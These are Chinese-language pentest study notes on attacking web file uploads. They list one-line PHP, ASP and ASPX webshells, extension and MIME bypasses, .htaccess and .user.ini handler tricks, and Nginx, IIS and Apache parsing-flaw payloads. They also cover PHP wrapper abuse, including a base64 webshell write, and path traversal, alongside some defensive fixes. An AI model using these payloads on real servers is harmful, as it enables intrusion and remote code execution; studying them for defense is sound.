文件上传笔记整理

文件上传
- web渗透的核心，内网渗透的基础
- 通过上传webshell文件到对方的服务器来获得对方服务器的控制权
成功条件
- 文件成功上传到对方的服务器（躲过杀软）
- 知道文件上传的具体路径
- 上传的文件可以执行成功
文件上传的流程
- 前端JS对上传文件进行检测（文件类型）
- 服务器端MIME类型（文件类型）检测
- 服务器端目录路径检测
- 服务器端文件扩展名检测
- 服务器端文件内容检测
常用的一句话木马
- php
  - <?php @eval($_GET['cmd']);?>
  - <?php @eval($_POST['cmd']);?>
  - <?php @eval($_REQUEST['cmd']);?>
- asp
  - <% eval request('cmd') %>
- aspx
  - <%@ page Language ="Jscript" %><% eval (Request.Item["pass"],"unsafe");%>
文件上传的几种情况
- 前端JS绕过（验证文件后缀）
  - 浏览器设置禁用JS代码（不执行检测代码）
  - 正常文件上传，BP抓包修改文件后缀
  - F12检查页面代码，删除/修改检测函数（火狐支持，谷歌有代码保护）
  - F12检查页面代码，替换JS文件（检查窗口不能关闭）
- 后端MIME类型绕过（验证MIME类型）
  - BP抓包后通过MIME类型爆破得到通过的MIME类型，后缀名修改
- 后端文件后缀名验证+文件内容验证
  - 黑名单验证
    - 尝试对文件后缀名进行爆破（所有可执行的后缀名）
    - 如果对方是Apache服务器，可以尝试上传.htaccess文件，设置该文件夹下的文件都进行php解析（对方不过滤.htaccess文件且不修改文件名称时用）
      - <FilesMatch "1.jpg">SetHandler application/x-httpd-php</FilesMatch> （指定文件1.jpg用php解析）
      - SetHandler application/x-httpd-php （当前目录下所有文件都通过php解析）
    - user.ini文件绕过
      - .user.ini所在目录中的所有php文件解析时都包含1.php；相当于加上了include(./1.png);文件具体路径可以自己设置
      - auto_prepend_file=1.png；开头被包含
      - auto_append_file=1.png; 结尾被包含
    - 大小写绕过 .Php .pHp .PhP等
    - 空格绕过 .php ,
    - .绕过 .php.
    - ..绕过 .php.. .php......等
    - /绕过
    - ::$DATA绕过 .php::$DATA
    - 循环验证绕过.pphphp .phtmlhp等
    - unicode编码绕过
    - url编码绕过
  - 白名单验证
    - 路径绕过
      - 文件路径可以操作
        POST hex下修改00绕过
        
        GET %00绕过
      - 对文件路径无验证
    - 文件内容验证
      - 添加图片文件头绕过
      - 二次循环验证（针对文件内容被修改了）
    - 竞争上传（针对先保留再删除的验证逻辑）
    - 逻辑漏洞（代码审计出的逻辑上的漏洞）
      - 通过功能实现逻辑存在漏洞；需要代码审计
  - 解析漏洞（服务器对某些特殊文件按脚本格式处理而产生的漏洞）
    - Nginx
      - 空字节代码执行漏洞（<8.03版本）（ 0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37）
        xxx.jpg%00.php
      - cgi.fix_pathinfo问题
        解释：例如/info.jpg/1.php/2.zhide
        先找/info.jpg/1.php/2.zhide文件；没找到则把/info.jpg/1.php作为文件查找；找到则用/inifo.jpg/1.php作为/info.jpg/1.php/2.zhide执行；还没找到则依次类推
        
        绕过方法（通过上传图片马；在图片的url路径结尾加上/1.php即可解析图片马）
        /1.jpg/1.php
        
        /1.jpg%00.php
        
        /1.jpg/%20\0.php
      - 解决方式：
        设置php.ini中的 cgi.fix_pathinfo=0;
        
        禁止上传目录的执行脚本权限
        
        库站分离
        
        高版本设置security.limit_extensions = .php；限制php文件执行
    - IIS
      - IIS5.x~IIS6.x
        /xx.asp/xx.jpg
        
        xx.asp;.jpg
        
        test.asa/ test.cer/ test.cdx/
        
        升级版本，更新补丁
      - IIS7.x
        任何文件后面加上/.php就会以php进行解析；直接在url中加就行
        
        可以实现对图片马的直接执行
        
        解决方法：设置php.ini中cgi.fix_pathinfo=0；并重启php-cgi程序
    - Apache
      - 2.4.0~2.4.29
        $可以匹配\n \r等字符；（换行解析漏洞）
        
        php%0a绕过；会当成php进行解析
        
        php\x0A绕过；同上
        
        升级apache版本即可避免这个问题
      - 允许多个后缀且从右往左识别后缀名（多个后缀识别解析漏洞）
        test.php.php123 (从右往左进行判断解析)
      - Add Handler解析漏洞
        如果用户手动设置了.php文件的解析
        AddHandler php5-script .php
        test2.php.jpg绕过；后缀存在php就用php进行解析
        
        AddType application/x-httpd-php .jpg (即使扩展名是jpg也一样用php解析)
        设置的所有后缀都会以php解析
        
        解决方法：默认不手动设置php解析操作
文件包含
- 本地包含
  - 普通的文件包含；地址为本地地址
- 远程包含
  - 文件地址为url远程文件地址
- php伪协议
  - allow_url_fopen默认开启 allow_url_include默认关闭
    - 常用的伪协议示例
  - file:// +文件的绝对路径
    - 使用本地的绝对路径
  - php://
    - 常用
      - php://filter/read=convert.base64-encode/resource=./index
        
        查看源码
        
        参数格式
        resoure=<要过滤的数据流> 必须参数，指定筛选过滤的数据流
        
        read=<读链的筛选列表> 可选参数，可设定一个或多个过滤器名称，以管道符(|)分隔
        
        write=<写链的筛选列表> 可选参数，可设定一个或多个过滤器名称，以管道符(|)分隔<;两个链的筛选列表>
        filename=php://filter/write=convert.base64-decode/resource=shell.php&txt=PD9waHAgZXZhbCgkX0dFVFsnaWQnXSk7Pz4=
        
        打开文件时对内容进行base64解码然后写入
        
        任何没有以read=或write=作前缀的筛选器列表会视情况应用于读或写链
        
        编码类型（过滤器）
      - php://input+POST请求内容（具体内容必须写在POST请求体中）
        
        元数据的只读流；allow_url_include=On时可用
        
        注：当enctype=”multipart/form-data”时，php://input是无效的。
    - php://output
      - 将内容以标准输出的形式写道缓存区
    - php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include
  - https/http://+url地址
    - allow_url_include=On;allow_url_open=On;
    - 多用于远程文件包含
  - 压缩流
    - zip://压缩文件绝对路径%23压缩包中文件名
      - 可以直接执行压缩包中的内容
      - %23 #
      - zip://D:\phpstudy_pro\WWW\123.com\text.zip%23text.txt
    - compress.bzip2://[文件绝对路径|文件相对路径]
      - 访问压缩文件中子文件
    - compress.zlib://[文件绝对路径|文件相对路径]
      - 访问压缩文件中子文件
    - phar://[文件绝对路径|文件相对路径]/[子文件名称]
      - 归档；访问压缩文件中的子文件
  - data://text/plain 具体命令
    - allow_url_fopen=On allow_url_include=On
    - data://text/plain;base64,<执行代码的base64编码> | data://text/plain,<执行的代码>
    - 读取文件内容并执行
  - glob://
  - ssh2://
  - rar://
  - ogg://
  - expect://
文件包含防御
- allow_url_include和allow_url_fopen关闭；
- 对用户包含的文件进行限制，如白名单、open_basedir；
- 检查用户输入；
- 检查变量是否初始化；
- 关键的过滤在服务器端进行；
文件下载
- 抓取能下载的文件路径；尝试利用../操作来获取对方未允许下载的文件
- 一般都设有文件保护
小技巧
- WINDOWS系统对大小写不敏感，Linux对大小写敏感（可以尝试对网址大小写修改判断对方操作系统）
- 通过修改登录页面index文件的后缀名判断网站的编程，如.php、.asp、.jsp（能运行表示使用该编程语言)
- 文件上传绕过步骤（大致思路）
  - 上传正常的图片文件看回显
  - 删除MIME类型看效果
    - 有问题就MIME爆破
    - 没问题再测试后缀
  - 乱码后缀检测对方的验证方式（确认黑名单还是白名单）
    - 黑名单时后缀名爆破
    - 白名单时尝试解析漏洞